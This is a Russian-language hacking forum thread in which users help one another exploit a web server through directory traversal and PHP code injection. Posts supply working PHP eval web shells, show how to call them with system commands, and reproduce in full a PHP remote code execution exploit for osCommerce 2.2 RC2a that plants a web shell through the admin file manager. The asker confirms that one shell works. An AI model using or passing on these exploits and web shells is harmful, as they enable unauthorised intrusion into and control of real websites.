Ваши вопросы по уязвимостям.

Подскажите. Могу читать файлы и листинг файлов в папке через cgi
Папку "?lang=../../../../WINDOWS/" выводит нормально. А вот в "?lang=../../../../Documents and Settings/" не получается. Походу из-за пробелов.Как бы это обойти. Прочтовал пробел заменить на 0x20 непомогло. Также попробовал всю строку представить в других кодировках (url, sql, char) непомогает.

 

а ты передавал команды?

 

кагбэ так:

http://127.0.0.1/index.php?cmd=ls
и т д

 

возможно надо сделать "Documents\ and\ Settings"

 

В Documents and Setting незайдёшь из шелла, ибо прав нету =\

 

в DOS формате заюзать попробуй

 

Да. Конечно. Но ничего.

Пробовал <?php phpinfo(); ?> работает отлично.

Залил вот это <?php%20@eval(\$_POST[cmd]);?> ошибок

не выдаёт, но что-то не пойму как команды выполнять

shell.php?cmd=id не катит.

 

переметру cmd передавай пых код

 

Ошибок не выдаёт, потому что перед eval стоит @.
Чтоб команды выполнять, надо отправлять команды через POST. Для этого можно, к примеру, написать форму, а можно пользоваться программой для подделки http-заголовка. Типа InetCrack или HTTPReq
В общем заливай так: <?php eval(\$_GET['cmd']); ?>

 

#10081

 

Если не трудно можно пример такого запроса для:

pwd;ls -l

 

в случае с eval() то shell.php?cmd=system(ls -la);

 

Не работает из этого ничего.

<?php phpinfo(); ?> работает отлично

 

ты как бы вопрос там видел? нет? я повторю:
через что ты заливаешь шелл?
[a] - SQL инъекция
- PHP инъкция
[c] - Через какой-нибудь файловый менеджер.

 

Вот отсюда взял

http://www.milw0rm.com/exploits/9556

 

хм... а в чем сложность запустить сплоит?
я его чуть-чуть подправил... но всё же, ты руками что-ли делаешь?

PHP:

<?php
print_r('
+---------------------------------------------------------------------------+
osCommerce Online Merchant 2.2 RC2a RCE Exploit
by Flyh4t
mail: [email protected]
team: http://www.wolvez.org
dork: Powered by osCommerce
Gr44tz to q1ur3n 、puret_t、uk、toby57 and all the other members of WST
Thx to exploits of blackh
+---------------------------------------------------------------------------+
');
$host ='domain.com';
$path = '/';
$admin_path = 'admin/';
$shellcode = "filename=fly.php&file_contents=test<?php%20@eval(\$_GET[aifly]);?>";
$message="POST ".$path.$admin_path."file_manager.php/login.php?action=save HTTP/1.1\r\n";
$message.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message.="Accept-Language: zh-cn\r\n";
$message.="Content-Type: application/x-www-form-urlencoded\r\n";
$message.="Accept-Encoding: gzip, deflate\r\n";
$message.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$message.="Host: $host\r\n";
$message.="Content-Length: ".strlen($shellcode)."\r\n";
$message.="Connection: Close\r\n\r\n";
$message.=$shellcode;
$fd = fsockopen($host,'80');
if(!$fd)
{
    echo '[~]No response from'.$host;
    die;
}
fputs($fd,$message);
echo ("[+]Go to see U webshell : $host/fly.php");
?>

шел будет тут и запускаться так domain.com/fly.php?aifly=[PHP-КОД]

 

Не работает

 

Угу, ты хакер. Поменял
$host ='democn.51osc.com';
на
$host ='domain.com'; ? Круто!

=====================
sideup

Залей туда
<?php eval(stripslashes($_REQUEST[ev])); ?>
и обратись к скрипту вот так:

shell.php?ev=phpinfo();

=======================

 

СПАСИБО!!! РАБОТАЕТ.

 

Угу, внимательный мистер. Вообще-то если ты не заметил по предыдущем постам, sideup, запрашивал через GET eval() когда ОН РУССКИМИ БУКВАМИ БЕРЕТ ТОЛЬКО POST. Не выебывайся